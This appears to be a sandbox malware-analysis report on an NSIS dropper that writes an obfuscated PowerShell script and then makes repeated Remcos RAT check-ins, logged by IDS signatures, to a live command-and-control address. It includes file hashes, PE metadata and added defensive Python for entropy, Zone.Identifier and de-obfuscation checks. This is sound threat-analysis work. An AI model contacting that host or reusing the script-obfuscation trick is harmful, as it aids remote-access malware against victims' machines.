                                                                              Preview:.......................ddd.55......i.VVVV.........00...D.............XXX.....)).............[[........................W.......l.....RR.S......Y.r....jjjjj.............9.....n..YY.....CC..............i.....ss............((.......QQ......................`........................U.......RRRR...................ii..........)).Z..S..V.......7.........==........n...............W..............l.CC.......QQQ.............@@.'.........&..................................`.......... ........q..$..........................g.........}..%%%......SS.H...............D.o... ...."..................BB...................B.......Q..pp...................ooo....................~..................`.hhhhh....qq.....................................22.........^^^..rr..................[[.............X.........((........................................YYY.........................).....L....&..........NN........................2.....T.y...aa..................._................@@..........lllll.....................Q...
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                              Category:dropped
                                                                              Size (bytes):777513
                                                                              Entropy (8bit):7.7705679792239994
                                                                              Encrypted:false
                                                                              SSDEEP:12288:0GCX77iIc2b3mMhkApKwjVim+PMpa3oGk6Rcs93tRLPHj6XOahG:qr75cY2vFikV/oGtR193tJPDUOr
                                                                              MD5:74C8F736D425B1BD2027C2B5B144E188
                                                                              SHA1:76F160D6C55611B99DCD10F85889957CB867990A
                                                                              SHA-256:293EBD610B0542289FFE9A52CAB2C2A434DCFF94918045A5ED1497DEAEE5EB87
                                                                              SHA-512:C859F5D689B168A72DB6FC7FEC5ED3C2A95CBD51402F0128B5370EC0CD41D73E02F90E3B27B85B8D76C5C0140BD9A6D9341D2422673BAA52A5138FF689596162
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 58%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P..*_...P...P..OP..*_...P..s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@..........................0............@..........................................0...............................................................................................................text...{c.......d.................. ..`.rdata...............h..............@..@.data...............~..............@....ndata.......P...........................rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                              Process:C:\Users\user\Desktop\WtZl31OLfA.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):452801
                                                                              Entropy (8bit):1.253535297499313
                                                                              Encrypted:false
                                                                              SSDEEP:1536:R7Kt/6RsOVcDyFtUkKQGef5fnB6vj/MuIqMas+dEgEcn03:DpVZBKsH6vFhMas+nn03
                                                                              MD5:36666AD5AFAD8972D1AC9D4BB141614D
                                                                              SHA1:2F50E39B78F2E1B8B751F61FDDCA0478B8A98274
                                                                              SHA-256:03325F7F88E997850F990A57E7DA4A4A9EDB0597E76110522D8DB6DA14F822E8
                                                                              SHA-512:51AF93E94F43711C7DDC75C08EBA8AD82E36799BAEC3F69572D0FEA349E3F9809D53D07EA6E4A430D46509FE88B923BC1EFDE1F8D414C9CEBBEF731D1C69F818
                                                                              Malicious:false
                                                                              Preview:.................................V..m....[.....................6.....................y....................................................i........................................l..................................1..r........Y.......\........@............p............................................................................................................................[.....?.................................................................................................u.'..........................................................a......)........}.....Z..........................................................................C............................B..............................F...........................................D.............H.............O...........~.....................................................F.......................n.D...........................................................N.................................................t.................7...
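The two dropped files above that are not opaque blobs are the 26-byte Zone.Identifier stream written by powershell.exe (preview "[ZoneTransfer]....ZoneId=0") and the 71,199-byte UTF-8 PowerShell script written by WtZl31OLfA.exe, whose preview shows one script character followed by seven characters of Danish-word filler. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it reimplements the report's 8-bit entropy measure and checks it against the 3.95 the report prints for the stream, parses the Zone.Identifier stream (ZoneId 0 is the Local Machine zone, so a file carrying it has no Mark of the Web; the same powershell.exe process also drops a PE whose MD5/SHA-1/SHA-256 equal the submitted sample's), and strips the filler from the script preview. The stride of 8 is read off the preview, and the keyword-based stride guesser is my heuristic rather than a documented property of the loader.

```python
import math
import re

# Constructed from the report's dropped-file records, not from the files themselves.
# 26-byte Zone.Identifier stream written by powershell.exe; the layout follows the
# report preview "[ZoneTransfer]....ZoneId=0" (non-printable bytes shown as dots).
ZONE_IDENTIFIER = b"[ZoneTransfer]\r\n\r\nZoneId=0"

# URLMON security zones as stored in ZoneId=
ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
              3: "Internet", 4: "Restricted Sites"}

# First 217 characters of the dropped script's here-string body, copied from the
# report preview. The preview renders a non-printable byte as '.', so the '.' after
# the first ';' is a line break in the real file.
SCRIPT_SAMPLE = (
    "$DendrolSBentle,vLdervineIntetkndStyrtsesG llate= Sikred$ Afd yp"
    "sOpbygniy OdorabnTyrannisHobbyplpSpartanununciatnTeeterikB gflik"
    "t Germa sSluknin; Odys,e.Bo gmesfTaktreguAn oneinParochic Udrens"
    "t forsigiGongmano Flannen"
)

# PowerShell keywords used to score de-interleaving candidates (my heuristic)
KEYWORDS = ("function", "param", "foreach", "while", "return", "invoke")


def shannon_entropy(data: bytes) -> float:
    """Per-byte Shannon entropy in bits (0.0 .. 8.0), the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_zone_identifier(stream: bytes) -> dict:
    """Parse a Zone.Identifier alternate data stream. Only ZoneId 3 and 4 carry the
    Mark of the Web that SmartScreen and Office Protected View key on."""
    text = stream.decode("ascii", errors="replace")
    match = re.search(r"ZoneId\s*=\s*(\d+)", text)
    if "[ZoneTransfer]" not in text or not match:
        raise ValueError("not a Zone.Identifier stream")
    zone_id = int(match.group(1))
    return {"zone_id": zone_id,
            "zone": ZONE_NAMES.get(zone_id, "unknown"),
            "from_untrusted_zone": zone_id >= 3}


def deinterleave(text: str, stride: int, phase: int = 0) -> str:
    """Keep one character every `stride` positions starting at `phase`; the other
    stride-1 characters in each group are filler."""
    return text[phase::stride]


def guess_stride(text: str, max_stride: int = 16) -> tuple:
    """Try every (stride, phase) and return the pair whose output contains the most
    PowerShell keywords; filler scores 0 at every stride, the real script does not."""
    best_score, best = 0, (1, 0)
    for stride in range(2, max_stride + 1):
        for phase in range(stride):
            candidate = deinterleave(text, stride, phase).lower()
            score = sum(candidate.count(k) for k in KEYWORDS)
            if score > best_score:
                best_score, best = score, (stride, phase)
    return best


if __name__ == "__main__":
    print(f"Zone.Identifier entropy: {shannon_entropy(ZONE_IDENTIFIER):.6f}")
    print("Zone.Identifier:", parse_zone_identifier(ZONE_IDENTIFIER))
    stride, phase = guess_stride(SCRIPT_SAMPLE)
    print(f"stride={stride} phase={phase}:", deinterleave(SCRIPT_SAMPLE, stride, phase))
```

On the real dropped script, run guess_stride over the text inside the @'...'@ here-string rather than over the whole file: the outer lines ($Modforanstaltninger=$Vejrkortene; and the $Reeksaminationen = @' assignment) are not interleaved. The preview reproduced on this page lost non-ASCII characters (Danish æ/ø/å) and collapsed runs of spaces, so positions drift after the first function keyword; on the original bytes the stride is expected to hold throughout.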
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                              Entropy (8bit):7.7705679792239994
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:WtZl31OLfA.exe
                                                                              File size:777'513 bytes
                                                                              MD5:74c8f736d425b1bd2027c2b5b144e188
                                                                              SHA1:76f160d6c55611b99dcd10f85889957cb867990a
                                                                              SHA256:293ebd610b0542289ffe9a52cab2c2a434dcff94918045a5ed1497deaee5eb87
                                                                              SHA512:c859f5d689b168a72db6fc7fec5ed3c2a95cbd51402f0128b5370ec0cd41d73e02f90e3b27b85b8d76c5c0140bd9a6d9341d2422673baa52a5138ff689596162
                                                                              SSDEEP:12288:0GCX77iIc2b3mMhkApKwjVim+PMpa3oGk6Rcs93tRLPHj6XOahG:qr75cY2vFikV/oGtR193tJPDUOr
                                                                              TLSH:0BF4E0B3DF396522ED4898B2E42B1DF7977444728A55E8133152BC37F9249A6EE0C20F
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@
                                                                              Icon Hash:b2b3aeb696aefe9e
                                                                              Entrypoint:0x4032a0
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x57017AB6 [Sun Apr 3 20:19:02 2016 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:e2a592076b17ef8bfb48b7e03965a3fc
                                                                              Instruction
                                                                              sub esp, 000002D4h
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              push 00000020h
                                                                              pop edi
                                                                              xor ebx, ebx
                                                                              push 00008001h
                                                                              mov dword ptr [esp+14h], ebx
                                                                              mov dword ptr [esp+10h], 0040A2E0h
                                                                              mov dword ptr [esp+1Ch], ebx
                                                                              call dword ptr [004080B0h]
                                                                              call dword ptr [004080ACh]
                                                                              cmp ax, 00000006h
                                                                              je 00007F55A8F140F3h
                                                                              push ebx
                                                                              call 00007F55A8F17234h
                                                                              cmp eax, ebx
                                                                              je 00007F55A8F140E9h
                                                                              push 00000C00h
                                                                              call eax
                                                                              mov esi, 004082B8h
                                                                              push esi
                                                                              call 00007F55A8F171AEh
                                                                              push esi
                                                                              call dword ptr [0040815Ch]
                                                                              lea esi, dword ptr [esi+eax+01h]
                                                                              cmp byte ptr [esi], 00000000h
                                                                              jne 00007F55A8F140CCh
                                                                              push ebp
                                                                              push 00000009h
                                                                              call 00007F55A8F17206h
                                                                              push 00000007h
                                                                              call 00007F55A8F171FFh
                                                                              mov dword ptr [00434EE4h], eax
                                                                              call dword ptr [0040803Ch]
                                                                              push ebx
                                                                              call dword ptr [004082A4h]
                                                                              mov dword ptr [00434F98h], eax
                                                                              push ebx
                                                                              lea eax, dword ptr [esp+34h]
                                                                              push 000002B4h
                                                                              push eax
                                                                              push ebx
                                                                              push 0042B208h
                                                                              call dword ptr [00408188h]
                                                                              push 0040A2C8h
                                                                              push 00433EE0h
                                                                              call 00007F55A8F16DE8h
                                                                              call dword ptr [004080A8h]
                                                                              mov ebp, 0043F000h
                                                                              push eax
                                                                              push ebp
                                                                              call 00007F55A8F16DD6h
                                                                              push ebx
                                                                              call dword ptr [00408174h]
                                                                              add word ptr [eax], 0000h
                                                                              Programming Language:
                                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                                               Name                                  Virtual Address  Virtual Size  Is in Section
                                                                               IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                               IMAGE_DIRECTORY_ENTRY_IMPORT          0x8610           0xa0          .rdata
                                                                               IMAGE_DIRECTORY_ENTRY_RESOURCE        0x53000          0x2f8e8       .rsrc
                                                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                               IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                               IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                                                                               IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                               IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                               IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x2b4         .rdata
                                                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                               IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                                               Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
                                                                               .text   0x1000           0x637b        0x6400    967d0e18ece4b8dcc63ec9d544660136  False     0.671484375          data       6.484796945043301   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                               .rdata  0x8000           0x14b0        0x1600    d6b0bc2db2de2a3dd996fda6539cef0e  False     0.4401633522727273   data       5.033673390997287   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                               .data   0xa000           0x2afd8       0x600     2aa587c909999ca52be17d0f1ffbd186  False     0.5188802083333334   data       4.039551377217298   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                               .ndata  0x35000          0x1e000       0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                               .rsrc   0x53000          0x2f8e8       0x2fa00   0d35228bed9e6f3e44cf465cb8cafb1c  False     0.35265440452755903  data       6.469094045775567   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
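The header fields and section table above support a few checks that are worth scripting rather than eyeballing. The Python below is an added example, not part of the report, with the report's values transcribed inline; the overlay estimate assumes a 0x400-byte header and contiguous sections, because the table lists raw sizes but not raw offsets.

```python
from datetime import datetime, timezone

# Header fields transcribed from the report's static analysis of WtZl31OLfA.exe
IMAGE_BASE = 0x400000
ENTRY_POINT = 0x4032a0
TIME_DATE_STAMP = 0x57017AB6
FILE_SIZE = 777513
FILE_CHARACTERISTICS = {"RELOCS_STRIPPED", "EXECUTABLE_IMAGE", "LINE_NUMS_STRIPPED",
                        "LOCAL_SYMS_STRIPPED", "32BIT_MACHINE"}
DLL_CHARACTERISTICS = {"DYNAMIC_BASE", "NX_COMPAT", "NO_SEH", "TERMINAL_SERVER_AWARE"}
BASERELOC_SIZE = 0x0          # IMAGE_DIRECTORY_ENTRY_BASERELOC is 0x0 / 0x0
HEADER_SIZE = 0x400           # assumption: SizeOfHeaders is not in the report

# (name, virtual address, virtual size, raw size, entropy) from the section table
SECTIONS = [
    (".text",  0x1000,  0x637b,  0x6400,  6.484796945043301),
    (".rdata", 0x8000,  0x14b0,  0x1600,  5.033673390997287),
    (".data",  0xa000,  0x2afd8, 0x600,   4.039551377217298),
    (".ndata", 0x35000, 0x1e000, 0x0,     0.0),
    (".rsrc",  0x53000, 0x2f8e8, 0x2fa00, 6.469094045775567),
]


def entry_point_section(entry_va, image_base, sections):
    """Name of the section containing the entry point, or None if it lies in
    none of them (a classic packer / injected-stub red flag)."""
    rva = entry_va - image_base
    for name, va, vsize, raw, _ in sections:
        if va <= rva < va + max(vsize, raw):
            return name
    return None


def aslr_effective(file_chars, dll_chars, reloc_dir_size):
    """DYNAMIC_BASE only asks for ASLR; with relocations stripped and no base
    relocation directory the loader cannot move the image, so it lands at
    ImageBase every time."""
    wants_aslr = "DYNAMIC_BASE" in dll_chars
    has_relocs = "RELOCS_STRIPPED" not in file_chars and reloc_dir_size > 0
    return wants_aslr and has_relocs


def section_findings(sections, high_entropy=7.0, growth=4):
    """Sections whose on-disk size does not match their in-memory footprint, or
    whose entropy suggests compressed or encrypted content."""
    findings = []
    for name, _, vsize, raw, entropy in sections:
        if raw == 0:
            findings.append((name, "no raw data: zero-filled at load"))
        elif vsize > growth * raw:
            findings.append((name, f"virtual size {vsize:#x} is {vsize // raw}x raw size {raw:#x}"))
        if entropy >= high_entropy:
            findings.append((name, f"entropy {entropy:.2f}: compressed or encrypted content"))
    return findings


def overlay_size(file_size, sections, header_size=HEADER_SIZE):
    """Bytes appended after the last section. Assumes the sections are laid out
    contiguously right after the headers (true for the usual NSIS stub)."""
    return file_size - (header_size + sum(raw for _, _, _, raw, _ in sections))


def compile_time(stamp):
    """TimeDateStamp as UTC, for comparison with the report's bracketed value."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


if __name__ == "__main__":
    print("entry point in", entry_point_section(ENTRY_POINT, IMAGE_BASE, SECTIONS))
    print("ASLR effective:", aslr_effective(FILE_CHARACTERISTICS, DLL_CHARACTERISTICS, BASERELOC_SIZE))
    print("compile time:", compile_time(TIME_DATE_STAMP))
    for name, why in section_findings(SECTIONS):
        print(f"{name}: {why}")
    print("overlay bytes (estimate):", overlay_size(FILE_SIZE, SECTIONS))
```

Two results matter for triage. DYNAMIC_BASE is set, but with RELOCS_STRIPPED and an empty base-relocation directory the image cannot be relocated, so it always maps at 0x400000 and the absolute addresses in the entry-point disassembly (call dword ptr [004080B0h]) are stable across runs. And the section entropies top out at 6.48 while the file as a whole is at 7.77, which points at the roughly 548 KB overlay after .rsrc: that is where a Nullsoft installer keeps its compressed archive, and it is the part a section-by-section view does not cover. Uninitialised .ndata and the .data section's small raw size are normal for the NSIS stub.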
                                                                               Name           RVA      Size     Type                                                                                  Language  Country        ZLIB Complexity
                                                                               RT_ICON        0x53388  0x10828  Device independent bitmap graphic, 128 x 256 x 32, image size 65536                   English   United States  0.19277179699514965
                                                                               RT_ICON        0x63bb0  0x94a8   Device independent bitmap graphic, 96 x 192 x 32, image size 36864                    English   United States  0.21263401303342444
                                                                               RT_ICON        0x6d058  0x74dc   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                           English   United States  0.9871306324374917
                                                                               RT_ICON        0x74538  0x5488   Device independent bitmap graphic, 72 x 144 x 32, image size 20736                    English   United States  0.2557301293900185
                                                                               RT_ICON        0x799c0  0x4228   Device independent bitmap graphic, 64 x 128 x 32, image size 16384                    English   United States  0.2701936702881436
                                                                               RT_ICON        0x7dbe8  0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 9216                      English   United States  0.333298755186722
                                                                               RT_ICON        0x80190  0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 4096                      English   United States  0.44183864915572235
                                                                               RT_ICON        0x81238  0x988    Device independent bitmap graphic, 24 x 48 x 32, image size 2304                      English   United States  0.5352459016393443
                                                                               RT_ICON        0x81bc0  0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 1024                      English   United States  0.6604609929078015
                                                                               RT_DIALOG      0x82028  0x100    data                                                                                  English   United States  0.5234375
                                                                               RT_DIALOG      0x82128  0xf8     data                                                                                  English   United States  0.6370967741935484
                                                                               RT_DIALOG      0x82220  0xa0     data                                                                                  English   United States  0.6125
                                                                               RT_DIALOG      0x822c0  0x60     data                                                                                  English   United States  0.7291666666666666
                                                                               RT_GROUP_ICON  0x82320  0x84     data                                                                                  English   United States  0.946969696969697
                                                                               RT_VERSION     0x823a8  0x1fc    data                                                                                  English   United States  0.5413385826771654
                                                                               RT_MANIFEST    0x825a8  0x340    XML 1.0 document, ASCII text, with very long lines (832), with no line terminators    English   United States  0.5540865384615384
DLL | Import
KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP / Dest Port (run together in the extracted text; only the first row can be separated, by matching the packet list below) | Protocol
2025-01-10T23:50:06.400374+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49396 | 142.250.185.78 / 443 | TCP
2025-01-10T23:50:13.191092+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49440 | 87.120.116.18756 | TCP
2025-01-10T23:50:15.834194+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49457 | 87.120.116.18756 | TCP
2025-01-10T23:50:18.474523+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49473 | 87.120.116.18756 | TCP
2025-01-10T23:50:21.130944+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49492 | 87.120.116.18756 | TCP
2025-01-10T23:50:23.771523+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49508 | 87.120.116.18756 | TCP
2025-01-10T23:50:26.412012+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49528 | 87.120.116.18756 | TCP
2025-01-10T23:50:29.053247+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49545 | 87.120.116.18756 | TCP
2025-01-10T23:50:31.681261+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49561 | 87.120.116.18756 | TCP
2025-01-10T23:50:34.346014+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49582 | 87.120.116.18756 | TCP
2025-01-10T23:50:36.975797+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49600 | 87.120.116.18756 | TCP
2025-01-10T23:50:39.630932+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49620 | 87.120.116.18756 | TCP
2025-01-10T23:50:42.318501+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49632 | 87.120.116.18756 | TCP
2025-01-10T23:50:44.943596+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49633 | 87.120.116.18756 | TCP
2025-01-10T23:50:47.553052+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49634 | 87.120.116.18756 | TCP
2025-01-10T23:50:50.193711+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49635 | 87.120.116.18756 | TCP
2025-01-10T23:50:52.834032+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49636 | 87.120.116.18756 | TCP
2025-01-10T23:50:55.601321+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49637 | 87.120.116.18756 | TCP
2025-01-10T23:50:58.240530+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49638 | 87.120.116.18756 | TCP
2025-01-10T23:51:00.865768+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49639 | 87.120.116.18756 | TCP
2025-01-10T23:51:03.639656+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49640 | 87.120.116.18756 | TCP
2025-01-10T23:51:06.365467+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49641 | 87.120.116.18756 | TCP
2025-01-10T23:51:08.977045+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49642 | 87.120.116.18756 | TCP
2025-01-10T23:51:11.646605+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49643 | 87.120.116.18756 | TCP
2025-01-10T23:51:14.334286+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49644 | 87.120.116.18756 | TCP
2025-01-10T23:51:16.990714+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49645 | 87.120.116.18756 | TCP
2025-01-10T23:51:19.679619+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49646 | 87.120.116.18756 | TCP
2025-01-10T23:51:22.302695+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49647 | 87.120.116.18756 | TCP
2025-01-10T23:51:24.960040+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49648 | 87.120.116.18756 | TCP
2025-01-10T23:51:27.601561+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49649 | 87.120.116.18756 | TCP
2025-01-10T23:51:30.225642+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49650 | 87.120.116.18756 | TCP
2025-01-10T23:51:32.859651+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49651 | 87.120.116.18756 | TCP
2025-01-10T23:51:35.495589+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49652 | 87.120.116.18756 | TCP
2025-01-10T23:51:38.167989+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49653 | 87.120.116.18756 | TCP
2025-01-10T23:51:40.802585+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49654 | 87.120.116.18756 | TCP
